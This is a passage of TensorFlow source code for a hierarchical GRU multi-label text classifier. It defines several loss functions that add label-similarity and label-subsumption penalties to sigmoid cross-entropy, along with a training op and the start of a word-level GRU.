losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
            # only considering the similarity of co-occurring labels in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
#get an index vector from y_d
label_index_2d = tf.where(label_vector)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |R(S_dj)-R(S_dk)|
pred_d_true = tf.round(s_d_true)
pair_diff_abs_d = tf.abs(tf.transpose(pred_d_true) - pred_d_true)
#gather the Sim_jk from Sim
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_abs_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim only: j,k per batch
def loss_multilabel_onto_new_sim_per_batch(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
            # only considering the similarity of co-occurring labels in each labelset y_d.
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True) # input_y_multilabel is a matrix \in R^{|D|,|T|}
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sim_matrix = tf.multiply(co_label_mat_batch,label_sim_matrix) # only considering the label similarity of labels in the label set for this document (here is a batch).
# sim-loss after sigmoid L_sim = sim(T_j,T_k)|s_dj-s_dk|^2
sig_output = tf.sigmoid(self.logits) # self.logit is the matrix S \in R^{|D|,|T|}
vec_square = tf.multiply(sig_output,sig_output) # element-wise multiplication
vec_square = tf.reduce_sum(vec_square,0) # an array of num_classes values {sum_d l_dj^2}_j
vec_mid = tf.matmul(tf.transpose(sig_output),sig_output)
            vec_rows=tf.ones([tf.size(vec_square),1])*vec_square # tile the vector against itself to form a square matrix
vec_columns=tf.transpose(vec_rows)
vec_diff=vec_rows-2*vec_mid+vec_columns # (li-lj)^2=li^2-2lilj+lj^2 # vec_diff is now a matrix = {sum_d (l_di-l_dj)^2}_i,j
vec_diff=tf.multiply(vec_diff,label_sim_matrix) #sim(T_i,T_j)*(li-lj)^2 # element-wise # using the label_sim_matrix
#vec_diff=tf.multiply(vec_diff,co_label_mat_batch) # using only tag co-occurrence
vec_final=tf.reduce_sum(vec_diff)/2 # vec_diff is symmetric
#vec_final=tf.reduce_sum(vec_diff)/2/self.num_classes/self.num_classes # vec_diff is symmetric
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# sim-loss only: j,k per document - tensor operations only - requiring large GPU memory
def loss_multilabel_onto_new_sim_per_doc_tensor(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
            # only considering the similarity of co-occurring labels in each labelset y_d.
co_label_mat = tf.matmul(tf.expand_dims(self.input_y_multilabel,2),tf.expand_dims(self.input_y_multilabel,1)) # (128,5196,5196)
label_sim_matrix = tf.multiply(co_label_mat,tf.expand_dims(label_sim_matrix,0))
# sim-loss after sigmoid L_sim = sim(T_j,T_k)|s_dj-s_dk|^2
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
vec_diff_squared = tf.square(tf.expand_dims(sig_output,1)-tf.expand_dims(sig_output,2)) # (128,5196,5196)
vec_final = tf.reduce_sum(tf.multiply(label_sim_matrix,vec_diff_squared))/2.0
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# sim-loss only: j,k per document - with for loop operations - requiring large GPU memory [not used]
def loss_multilabel_onto_new_sim_per_doc_not_used(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
            # only considering the similarity of co-occurring labels in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
logit_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(logit_list)):
logit_vector = tf.expand_dims(logit_list[i],1)
logit_list[i] = tf.multiply(logit_list[i],0)
#print("logit_vector:",logit_vector)
pair_diff = tf.transpose(logit_vector) - logit_vector # pair_diff: {l_di-l_dj}_i,j
#print("pair_diff:",pair_diff)
pair_diff_squared = tf.square(pair_diff) # pair_diff_squared: {|l_di-l_dj|^2}_i,j
#print("pair_diff_squared:",pair_diff_squared)
label_vector = label_list[i]
label_list[i] = tf.multiply(label_list[i],0)
#print("label_vector:",label_vector)
label_co_doc = tf.matmul(tf.transpose(label_vector),label_vector)
#print("label_co_doc:",label_co_doc)
label_co_sim_doc = tf.multiply(label_co_doc,label_sim_matrix)
#print("label_co_sim_doc:",label_co_sim_doc)
pair_diff_weighted = tf.multiply(label_co_sim_doc,pair_diff_squared)
#print("pair_diff_weighted:",pair_diff_weighted)
self.sim_loss = self.sim_loss + tf.reduce_sum(pair_diff_weighted)
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim only: j,k per document
def loss_multilabel_onto_new_sim_per_doc(self, label_sim_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # not adding sim and/or sem matrices into the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sim_mat' not in v.name]) * l2_lambda
            # only considering the similarity of co-occurring labels in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |s_dj-s_dk|^2
pair_diff_squared_d = tf.square(tf.transpose(s_d_true) - s_d_true)
#gather the Sim_jk from Sim
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
#ind_flat_lower = tf.tile(label_index,[label_len])
#ind_mat = tf.reshape(ind_flat_lower,[label_len,label_len])
#ind_flat_upper = tf.reshape(tf.transpose(ind_mat),[-1])
#ind_squ = tf.transpose(tf.stack([ind_flat_upper,ind_flat_lower]))
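                #build all (j,k) index pairs over the document's true labels with
                #meshgrid, then gather the matching Sim_jk entries as a square block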
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_squared_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim and L_sub - per doc - L_sim as lambda_sim*|R(S_dj)-R(S_dk)|
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hyponym of T_k.
def loss_multilabel_onto_new_simsub_pair_diff_abs(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
#get an index vector from y_d
label_index_2d = tf.where(label_vector)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |R(S_dj)-R(S_dk)|
pred_d_true = tf.round(s_d_true)
pair_diff_abs_d = tf.abs(tf.transpose(pred_d_true) - pred_d_true)
#calculate R(s_dj)(1-R(s_dk))
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sim_jk from Sim and the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_abs_d))
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sim and L_sub - per doc
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hyponym of T_k.
def loss_multilabel_onto_new_simsub_per_doc(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: a `Tensor` of the same shape as `logits` with the element-wise sigmoid cross-entropy loss.
# input_y: shape=(?, 1999); logits: shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is: z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel, logits=self.logits)
# single-label alternative: losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits)
# equivalently: losses = -z*tf.log(sigmoid(x)) - (1-z)*tf.log(1-sigmoid(x))
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). per-example loss, summed over labels
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss over the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # exclude the sim and sub matrices from the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sim_mat' not in v.name and 'label_sub_mat' not in v.name]) * l2_lambda
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#print("label_vector_bool:",label_vector_bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |s_dj-s_dk|^2
pair_diff_squared_d = tf.square(tf.transpose(s_d_true) - s_d_true)
#calculate R(s_dj)(1-R(s_dk))
pred_d_true = tf.round(s_d_true)
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sim_jk from Sim and the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_squared_d))
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sim and L_sub - per batch, used in the NAACL paper
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hyponym of T_k.
def loss_multilabel_onto_new_simsub_per_batch(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: a `Tensor` of the same shape as `logits` with the element-wise sigmoid cross-entropy loss.
# input_y: shape=(?, 1999); logits: shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is: z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel, logits=self.logits)
# single-label alternative: losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits)
# equivalently: losses = -z*tf.log(sigmoid(x)) - (1-z)*tf.log(1-sigmoid(x))
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). per-example loss, summed over labels
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss over the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True)
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sim_matrix = tf.multiply(co_label_mat_batch,label_sim_matrix) # only considering the label similarity of labels in the label set for this document (batch of documents).
label_sub_matrix = tf.multiply(co_label_mat_batch,label_sub_matrix)
# the sim-loss after sigmoid
sig_output = tf.sigmoid(self.logits)
vec_square = tf.multiply(sig_output,sig_output)
vec_square = tf.reduce_sum(vec_square,0) # an array of num_classes values {sum_d l_di}_i
vec_mid = tf.matmul(tf.transpose(sig_output),sig_output)
vec_rows=tf.ones([tf.size(vec_square),1])*vec_square
vec_columns=tf.transpose(vec_rows)
vec_diff=vec_rows-2*vec_mid+vec_columns # (li-lj)^2=li^2-2lilj+lj^2 # vec_diff is now a matrix = {sum_d (l_di-l_dj)^2}_i,j
vec_diff=tf.multiply(vec_diff,label_sim_matrix) #sim(T_i,T_j)*(li-lj)^2 # element-wise # using the label_sim_matrix
#vec_diff=tf.multiply(vec_diff,co_label_mat_batch) # using only tag co-occurrence
vec_final=tf.reduce_sum(vec_diff)/2 # vec_diff is symmetric
#vec_final=tf.reduce_sum(vec_diff)/2/self.num_classes/self.num_classes # vec_diff is symmetric
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
# the sub-loss after sigmoid
pred = tf.round(sig_output)
pred_mat = tf.matmul(tf.transpose(pred),1-pred)
sub_loss = tf.multiply(pred_mat,label_sub_matrix)
self.sub_loss = self.lambda_sub * tf.reduce_sum(sub_loss) / 2. / self.batch_size
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sub only - per batch - used in the NAACL paper
def loss_multilabel_onto_new_sub_per_batch(self, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: a `Tensor` of the same shape as `logits` with the element-wise sigmoid cross-entropy loss.
# input_y: shape=(?, 1999); logits: shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is: z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel, logits=self.logits)
# single-label alternative: losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits)
# equivalently: losses = -z*tf.log(sigmoid(x)) - (1-z)*tf.log(1-sigmoid(x))
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). per-example loss, summed over labels
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss over the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
## sub_loss via matrix multiplication: using only the label relations present in the batch's label set, treated the same for every document in the batch.
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True)
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sub_matrix = tf.multiply(co_label_mat_batch,label_sub_matrix)
# the sub-loss after sigmoid
sig_output = tf.sigmoid(self.logits)
pred = tf.round(sig_output)
pred_mat = tf.matmul(tf.transpose(pred),1-pred)
sub_loss = tf.multiply(pred_mat,label_sub_matrix)
self.sub_loss = self.lambda_sub * tf.reduce_sum(sub_loss) / 2. / self.batch_size
self.sim_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sub_loss
return loss
# L_sub only - per document
def loss_multilabel_onto_new_sub_per_doc(self, label_sub_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: a `Tensor` of the same shape as `logits` with the element-wise sigmoid cross-entropy loss.
# input_y: shape=(?, 1999); logits: shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is: z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel, logits=self.logits)
# single-label alternative: losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits)
# equivalently: losses = -z*tf.log(sigmoid(x)) - (1-z)*tf.log(1-sigmoid(x))
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). per-example loss, summed over labels
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss over the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # exclude the sub matrix from the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sub_mat' not in v.name]) * l2_lambda
## sub_loss: using only the label relations within each document's own label set y_d.
# i.e., only considering the sub-relations of co-occurring labels in each label set y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate R(s_dj)(1-R(s_dk))
pred_d_true = tf.round(s_d_true)
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
self.sim_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sub_loss
return loss
def train(self):
"""based on the loss, use SGD to update parameter"""
learning_rate = tf.train.exponential_decay(self.learning_rate, self.global_step, self.decay_steps,self.decay_rate, staircase=True) #exponential_decay
#train_op = tf.contrib.layers.optimize_loss(self.loss_val, global_step=self.global_step,learning_rate=learning_rate, optimizer="Adam")
train_op = tf.contrib.layers.optimize_loss(self.loss_val, global_step=self.global_step,learning_rate=learning_rate, optimizer="Adam",clip_gradients=self.clip_gradients) #using adam here. # gradient cliping is also applied.
return train_op
def gru_single_step_word_level(self, Xt, h_t_minus_1):
"""
single step of gru for word level
:param Xt: Xt:[batch_size*num_sentences,embed_size]
:param h_t_minus_1:[batch_size*num_sentences,embed_size]
:return:
"""
# update gate: decides how much past information is kept and how much new information is added.
z_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_z) + tf.matmul(h_t_minus_1,
self.U_z) + self.b_z) # z_t:[batch_size*num_sentences,self.hidden_size]
# reset gate: controls how much the past state contributes to the candidate state.
r_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_r) + tf.matmul(h_t_minus_1,
self.U_r) + self.b_r) # r_t:[batch_size*num_sentences,self.hidden_size]
# candidate state h_t~
h_t_candidate = tf.nn.tanh(tf.matmul(Xt, self.W_h) + r_t * (tf.matmul(h_t_minus_1, self.U_h)) + self.b_h) # h_t_candidate:[batch_size*num_sentences,self.hidden_size]
# new state: a linear interpolation between the previous hidden state and the candidate state h_t~
h_t = (1 - z_t) * h_t_minus_1 + z_t * h_t_candidate # h_t:[batch_size*num_sentences,hidden_size]
return h_t
# forward gru for first level: word levels
def gru_forward_word_level(self, embedded_words):
"""
:param embedded_words:[batch_size*num_sentences,sentence_length,embed_size]
:return: forward hidden states: a list of length sentence_length; each element is [batch_size*num_sentences,hidden_size]
"""
# split embedded_words along the time axis
embedded_words_splitted = tf.split(embedded_words, self.sequence_length, axis=1) # a list of length sentence_length; each element is [batch_size*num_sentences,1,embed_size]
# here, sequence_length is the sentence_length
#print('after splitting in gru', len(embedded_words_splitted), embedded_words_splitted[0].get_shape())
embedded_words_squeeze = [tf.squeeze(x, axis=1) for x in embedded_words_splitted] # a list of length sentence_length; each element is [batch_size*num_sentences,embed_size]
